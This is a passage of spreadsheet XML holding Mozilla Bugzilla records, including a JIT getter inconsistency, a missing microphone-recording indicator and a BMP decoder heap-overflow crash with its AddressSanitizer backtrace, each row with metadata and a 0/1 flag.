https://docs.google.com/spreadsheets/d/1Jzf-ee8MedDHdb9wUTfrbHr9NX6rnDiWUn4GaFjwp88/edit#gid=1695724660
Thanks and let me know if you have any questions
~Storm</t>
        </is>
      </c>
      <c r="X3395" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3396">
      <c r="A3396" t="n">
        <v>936056</v>
      </c>
      <c r="B3396" t="inlineStr">
        <is>
          <t>2013-11-07 09:29:35 -0800</t>
        </is>
      </c>
      <c r="C3396" t="inlineStr">
        <is>
          <t>Inconsistent this value when invoking getters on window</t>
        </is>
      </c>
      <c r="D3396" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:48 -0800</t>
        </is>
      </c>
      <c r="E3396" t="n">
        <v>1</v>
      </c>
      <c r="F3396" t="n">
        <v>1</v>
      </c>
      <c r="G3396" t="n">
        <v>3</v>
      </c>
      <c r="H3396" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3396" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3396" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3396" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3396" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3396" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3396" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3396" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3396" t="inlineStr">
        <is>
          <t>[adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q3396" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3396" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3396" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T3396" t="n">
        <v>1</v>
      </c>
      <c r="U3396" t="n">
        <v>0</v>
      </c>
      <c r="V3396" t="n">
        <v>75</v>
      </c>
      <c r="W3396" t="inlineStr">
        <is>
          <t>Consider this testcase:
  var count = 1000000;
  for (var i = 0; i &lt; count; ++i) {
    document;
  }
I've been investigating what gets passed as the thisv() to the JSNative getter for the document here.
When we're called from the interpreter, js::Shape::get calls js::InvokeGetterOrSetter which calls js::Invoke which outerizes the this object.  So in this case we get the outer window proxy as thisv().
When we baseline-compile this code we seem to end up calling js::jit::DoGetNameFallback which ends up taking the same codepath as the interpreter.
When we ion-compile this code, though, it looks like we're calling the getter directly from ioncode and it's no longer outerizing the this value in that case.
The inconsistency is pretty suboptimal, because it means depending on the jit compilation level you have you might or might not get a security exception on the bareword acess.
Furthermore, I would like us to generally move to the ion version here for JSNative getters, or at least for the DOM's window bindings: while we need to outerize the this for scripted getters, for JSNative ones that's just dataloss in that we can no longer reliably tell which actual global we're working with.  In particular, inner windows are in a many-to-one relationship with outer ones, so it's always possible to go from an inner to an outer but the reverse is not necessarily true unless one is really careful.  In fact, I think it's impossible to find the right C++ object in general in the bindings code if the outer is passed as thisv, which means that we end up having to assume that we should forward to the current inner, which can be a different object from the actual global the script is running on.
That's not to mention the performance issues involved with the outerObject hook and then unwrapping the extra layers of wrappers in the binding code.  ;)</t>
        </is>
      </c>
      <c r="X3396" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3397">
      <c r="A3397" t="n">
        <v>1719511</v>
      </c>
      <c r="B3397" t="inlineStr">
        <is>
          <t>2021-07-07 10:08:42 -0700</t>
        </is>
      </c>
      <c r="C3397" t="inlineStr">
        <is>
          <t>No recording notification for microphone</t>
        </is>
      </c>
      <c r="D3397" t="inlineStr">
        <is>
          <t>2023-01-16 20:45:54 -0800</t>
        </is>
      </c>
      <c r="E3397" t="n">
        <v>1</v>
      </c>
      <c r="F3397" t="n">
        <v>1</v>
      </c>
      <c r="G3397" t="n">
        <v>2</v>
      </c>
      <c r="H3397" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3397" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J3397" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3397" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3397" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3397" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3397" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3397" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3397" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main104+]</t>
        </is>
      </c>
      <c r="Q3397" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3397" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3397" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3397" t="n">
        <v>1</v>
      </c>
      <c r="U3397" t="n">
        <v>0</v>
      </c>
      <c r="V3397" t="n">
        <v>8</v>
      </c>
      <c r="W3397" t="inlineStr">
        <is>
          <t>Navigate to a page that records audio, e.g.: https://addpipe.com/simple-web-audio-recorder-demo/
Start recording, notice no notification appears that the page is recording audio.
Chrome shows a notification as expected.</t>
        </is>
      </c>
      <c r="X3397" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3398">
      <c r="A3398" t="n">
        <v>520227</v>
      </c>
      <c r="B3398" t="inlineStr">
        <is>
          <t>2009-10-02 11:17:58 -0700</t>
        </is>
      </c>
      <c r="C3398" t="inlineStr">
        <is>
          <t>try server master should be implemented as another branch in config.py</t>
        </is>
      </c>
      <c r="D3398" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3398" t="n">
        <v>1</v>
      </c>
      <c r="F3398" t="n">
        <v>1</v>
      </c>
      <c r="G3398" t="n">
        <v>5</v>
      </c>
      <c r="H3398" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3398" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3398" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3398" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3398" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3398" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3398" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3398" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3398" t="inlineStr"/>
      <c r="Q3398" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3398" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3398" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3398" t="n">
        <v>1</v>
      </c>
      <c r="U3398" t="n">
        <v>0</v>
      </c>
      <c r="V3398" t="n">
        <v>112</v>
      </c>
      <c r="W3398" t="inlineStr">
        <is>
          <t>If the Try server master was simply another block in config.py we could have a master3.cfg alongside that setups up the /try branch _exactly_ the same as any other branch. This would be a great way of keeping it in line with the rest of production.</t>
        </is>
      </c>
      <c r="X3398" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3399">
      <c r="A3399" t="n">
        <v>1360351</v>
      </c>
      <c r="B3399" t="inlineStr">
        <is>
          <t>2017-04-27 13:37:00 -0700</t>
        </is>
      </c>
      <c r="C3399" t="inlineStr">
        <is>
          <t>Intro fox is shown below the correct top sites then is filled in with the user's highlights</t>
        </is>
      </c>
      <c r="D3399" t="inlineStr">
        <is>
          <t>2017-05-09 08:06:48 -0700</t>
        </is>
      </c>
      <c r="E3399" t="n">
        <v>1</v>
      </c>
      <c r="F3399" t="n">
        <v>1</v>
      </c>
      <c r="G3399" t="n">
        <v>2</v>
      </c>
      <c r="H3399" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3399" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3399" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K3399" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3399" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3399" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3399" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3399" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3399" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q3399" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3399" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3399" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3399" t="n">
        <v>1</v>
      </c>
      <c r="U3399" t="n">
        <v>0</v>
      </c>
      <c r="V3399" t="n">
        <v>4</v>
      </c>
      <c r="W3399" t="inlineStr">
        <is>
          <t>STR: 
1. Connect FxA account and pull down some history items to populate with highlights
2. Navigate to a new tab, navigate to a new site (I find this helps in reproducing)
3. Launch Activity Stream panel
Expected:
Highlights are displayed below the top sites
Actual:
(Rarely) will see the intro fox appear below the top sites then get replaced by the user's highlights.
Tested on build #2923</t>
        </is>
      </c>
      <c r="X3399" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3400">
      <c r="A3400" t="n">
        <v>1172021</v>
      </c>
      <c r="B3400" t="inlineStr">
        <is>
          <t>2015-06-05 10:09:57 -0700</t>
        </is>
      </c>
      <c r="C3400" t="inlineStr">
        <is>
          <t>Docs: Remove DB init steps from setup instructions that are already run by puppet</t>
        </is>
      </c>
      <c r="D3400" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E3400" t="n">
        <v>1</v>
      </c>
      <c r="F3400" t="n">
        <v>1</v>
      </c>
      <c r="G3400" t="n">
        <v>7</v>
      </c>
      <c r="H3400" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3400" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3400" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3400" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3400" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3400" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3400" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3400" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3400" t="inlineStr"/>
      <c r="Q3400" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3400" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3400" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3400" t="n">
        <v>1</v>
      </c>
      <c r="U3400" t="n">
        <v>0</v>
      </c>
      <c r="V3400" t="n">
        <v>9</v>
      </c>
      <c r="W3400" t="inlineStr">
        <is>
          <t>The docs say to run lots of steps that are actually now unnecessary, since puppet runs them for us, as part of provision.
eg:
Initialize the master database
(venv)vagrant@local:~/treeherder$ ./manage.py init_master_db
Populate the database with repository data sources
(venv)vagrant@local:~/treeherder$ ./manage.py init_datasources</t>
        </is>
      </c>
      <c r="X3400" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3401">
      <c r="A3401" t="n">
        <v>1224979</v>
      </c>
      <c r="B3401" t="inlineStr">
        <is>
          <t>2015-11-15 18:30:39 -0800</t>
        </is>
      </c>
      <c r="C3401" t="inlineStr">
        <is>
          <t>BMP: heap-overflow crash [@mozilla::image::Downscaler::CommitRow]</t>
        </is>
      </c>
      <c r="D3401" t="inlineStr">
        <is>
          <t>2016-09-22 14:47:41 -0700</t>
        </is>
      </c>
      <c r="E3401" t="n">
        <v>1</v>
      </c>
      <c r="F3401" t="n">
        <v>1</v>
      </c>
      <c r="G3401" t="n">
        <v>3</v>
      </c>
      <c r="H3401" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3401" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3401" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3401" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3401" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3401" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3401" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3401" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3401" t="inlineStr">
        <is>
          <t>[adv-main45+]</t>
        </is>
      </c>
      <c r="Q3401" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3401" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3401" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T3401" t="n">
        <v>1</v>
      </c>
      <c r="U3401" t="n">
        <v>0</v>
      </c>
      <c r="V3401" t="n">
        <v>43</v>
      </c>
      <c r="W3401" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-inbound-linux64-asan revision df12438d4091e89409a5449b067867e57c24858b
See attachment.
Backtrace:
==1781==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400042f980 at pc 0x7fa29190bfdc bp 0x7fa27539b660 sp 0x7fa27539b658
READ of size 8 at 0x60400042f980 thread T23 (ImgDecoder #4)
    #0 0x7fa29190bfdb in mozilla::image::Downscaler::CommitRow() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Downscaler.cpp:204
    #1 0x7fa291958582 in mozilla::image::nsBMPDecoder::FinishRow() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:325
    #2 0x7fa29195dd8c in mozilla::image::nsBMPDecoder::ReadPixelRow(char const*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:733
    #3 0x7fa291982198 in mozilla::image::nsBMPDecoder::WriteInternal(char const*, unsigned int)::$_0::operator()(mozilla::image::nsBMPDecoder::State, char const*, unsigned long) const /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:355
    #4 0x7fa291959a14 in Lex&lt;&lt;lambda at /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:346:33&gt; &gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/StreamingLexer.h:288
    #5 0x7fa291959a14 in mozilla::image::nsBMPDecoder::WriteInternal(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:346
    #6 0x7fa291907ff2 in mozilla::image::Decoder::Write(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:183
    #7 0x7fa29196c984 in mozilla::image::nsICODecoder::WriteToContainedDecoder(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:738
    #8 0x7fa291980b8c in ReadBMP /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:506
    #9 0x7fa291980b8c in mozilla::image::nsICODecoder::WriteInternal(char const*, unsigned int)::$_1::operator()(mozilla::image::ICOState, char const*, unsigned long) const /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:706
    #10 0x7fa2919709e9 in Lex&lt;&lt;lambda at /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:689:16&gt; &gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/StreamingLexer.h:297
    #11 0x7fa2919709e9 in mozilla::image::nsICODecoder::WriteInternal(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:688
    #12 0x7fa291907ff2 in mozilla::image::Decoder::Write(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:183
    #13 0x7fa2919062ac in mozilla::image::Decoder::Decode(mozilla::image::IResumable*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:128
    #14 0x7fa291905cd2 in mozilla::image::DecodePool::Decode(mozilla::image::Decoder*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:453
    #15 0x7fa2919248bc in mozilla::image::DecodePoolWorker::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:282
    #16 0x7fa28f946c34 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:964
    #17 0x7fa28f9c0f6a in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:297
    #18 0x7fa29026d37f in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:326
    #19 0x7fa2901da9cc in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #20 0x7fa2901da9cc in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #21 0x7fa2901da9cc in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #22 0x7fa28f942800 in nsThread::ThreadFunc(void*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:376
    #23 0x7fa29cee24b5 in _pt_root /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #24 0x7fa29d521181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
0x60400042f980 is located 0 bytes to the right of 48-byte region [0x60400042f950,0x60400042f980)
allocated by thread T23 (ImgDecoder #4) here:
    #0 0x4750b1 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x48dd5d in moz_xmalloc /builds/slave/m-in-l64-asan-0000000000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7fa29190ca38 in operator new[] /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/image/../dist/include/mozilla/mozalloc.h:198
    #3 0x7fa29190ca38 in MakeUnique&lt;unsigned char *[]&gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/image/../dist/include/mozilla/UniquePtr.h:642
    #4 0x7fa29190ca38 in mozilla::image::Downscaler::BeginFrame(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::Maybe&lt;mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; &gt; const&amp;, unsigned char*, bool, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Downscaler.cpp:118
    #5 0x7fa29195c1d8 in mozilla::image::nsBMPDecoder::ReadInfoHeaderRest(char const*, unsigned long) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:555
    #6 0x7fa291981c3e in mozilla::image::nsBMPDecoder::WriteInternal(char const*, unsigned int)::$_0::operator()(mozilla::image::nsBMPDecoder::State, char const*, unsigned long) const /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:351
    #7 0x7fa291959a14 in Lex&lt;&lt;lambda at /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:346:33&gt; &gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/StreamingLexer.h:288
    #8 0x7fa291959a14 in mozilla::image::nsBMPDecoder::WriteInternal(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsBMPDecoder.cpp:346
    #9 0x7fa291907ff2 in mozilla::image::Decoder::Write(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:183
    #10 0x7fa29196c984 in mozilla::image::nsICODecoder::WriteToContainedDecoder(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:738
    #11 0x7fa29196d7b6 in mozilla::image::nsICODecoder::ReadBIH(char const*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:472
    #12 0x7fa291980b79 in mozilla::image::nsICODecoder::WriteInternal(char const*, unsigned int)::$_1::operator()(mozilla::image::ICOState, char const*, unsigned long) const /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:704
    #13 0x7fa291970884 in Lex&lt;&lt;lambda at /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:689:16&gt; &gt; /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/StreamingLexer.h:288
    #14 0x7fa291970884 in mozilla::image::nsICODecoder::WriteInternal(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/decoders/nsICODecoder.cpp:688
    #15 0x7fa291907ff2 in mozilla::image::Decoder::Write(char const*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:183
    #16 0x7fa2919062ac in mozilla::image::Decoder::Decode(mozilla::image::IResumable*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Decoder.cpp:128
    #17 0x7fa291905cd2 in mozilla::image::DecodePool::Decode(mozilla::image::Decoder*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:453
    #18 0x7fa2919248bc in mozilla::image::DecodePoolWorker::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:282
    #19 0x7fa28f946c34 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:964
    #20 0x7fa28f9c0f6a in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:297
    #21 0x7fa29026d37f in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:326
    #22 0x7fa2901da9cc in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #23 0x7fa2901da9cc in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #24 0x7fa2901da9cc in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #25 0x7fa28f942800 in nsThread::ThreadFunc(void*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:376
    #26 0x7fa29cee24b5 in _pt_root /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #27 0x7fa29d521181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
Thread T23 (ImgDecoder #4) created by T0 (Web Content) here:
    #0 0x461925 in pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
    #1 0x7fa29cedee3d in _PR_CreateThread /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:453
    #2 0x7fa29cede9ba in PR_CreateThread /builds/slave/m-in-l64-asan-0000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:544
    #3 0x7fa28f943f3d in nsThread::Init() /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:496
    #4 0x7fa28f94a62e in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThreadManager.cpp:249
    #5 0x7fa28f9c01f8 in NS_NewThread(nsIThread**, nsIRunnable*, unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:71
    #6 0x7fa291904831 in mozilla::image::DecodePool::DecodePool() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:355
    #7 0x7fa29190403b in mozilla::image::DecodePool::Singleton() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/DecodePool.cpp:315
    #8 0x7fa291955158 in mozilla::image::InitModule() /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/build/nsImageModule.cpp:95
    #9 0x7fa28f9185cd in Load /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/components/nsComponentManager.cpp:882
    #10 0x7fa28f9185cd in nsFactoryEntry::GetFactory() /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/components/nsComponentManager.cpp:1913
    #11 0x7fa28f919aa5 in nsComponentManagerImpl::CreateInstanceByContractID(char const*, nsISupports*, nsID const&amp;, void**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/components/nsComponentManager.cpp:1216
    #12 0x7fa28f910c54 in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/components/nsComponentManager.cpp:1575
    #13 0x7fa28f9b0461 in CallGetService /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsComponentManagerUtils.cpp:67
    #14 0x7fa28f9b0461 in nsGetServiceByContractID::operator()(nsID const&amp;, void**) const /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsComponentManagerUtils.cpp:280
    #15 0x7fa28f9a5086 in nsCOMPtr_base::assign_from_gs_contractid(nsGetServiceByContractID, nsID const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsCOMPtr.cpp:103
    #16 0x7fa29179bd15 in nsCOMPtr /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/gfx/thebes/../../dist/include/nsCOMPtr.h:540
    #17 0x7fa29179bd15 in gfxPlatform::Init() /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/thebes/gfxPlatform.cpp:617
    #18 0x7fa29179a064 in gfxPlatform::GetPlatform() /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/thebes/gfxPlatform.cpp:455
    #19 0x7fa294c7b343 in mozilla::dom::ContentProcess::Init() /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/ipc/ContentProcess.cpp:83
    #20 0x7fa29710d755 in XRE_InitChildProcess /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:603
    #21 0x48d740 in content_process_main(int, char**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:237
    #22 0x7fa28d2b1ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/slave/m-in-l64-asan-0000000000000000/build/src/image/Downscaler.cpp:204 mozilla::image::Downscaler::CommitRow()
Shadow bytes around the buggy address:
  0x0c088007dee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c088007def0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd
  0x0c088007df00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c088007df10: fa fa 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c088007df20: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
=&gt;0x0c088007df30:[fa]fa fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c088007df40: fa fa fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c088007df50: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fa
  0x0c088007df60: fa fa fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c088007df70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c088007df8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t>
        </is>
      </c>
      <c r="X3401" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3402">
      <c r="A3402" t="n">
        <v>1489691</v>
      </c>
      <c r="B3402" t="inlineStr">
        <is>
          <t>2018-09-07 16:04:52 -0700</t>
        </is>
      </c>
      <c r="C3402" t="inlineStr">
        <is>
          <t>PrioEncoder/libprio hitting assertion in freebl/ctr.c</t>
        </is>
      </c>
      <c r="D3402" t="inlineStr">
        <is>
          <t>2018-09-23 10:49:16 -0700</t>
        </is>
      </c>
      <c r="E3402" t="n">
        <v>1</v>
      </c>
      <c r="F3402" t="n">
        <v>1</v>
      </c>
      <c r="G3402" t="n">
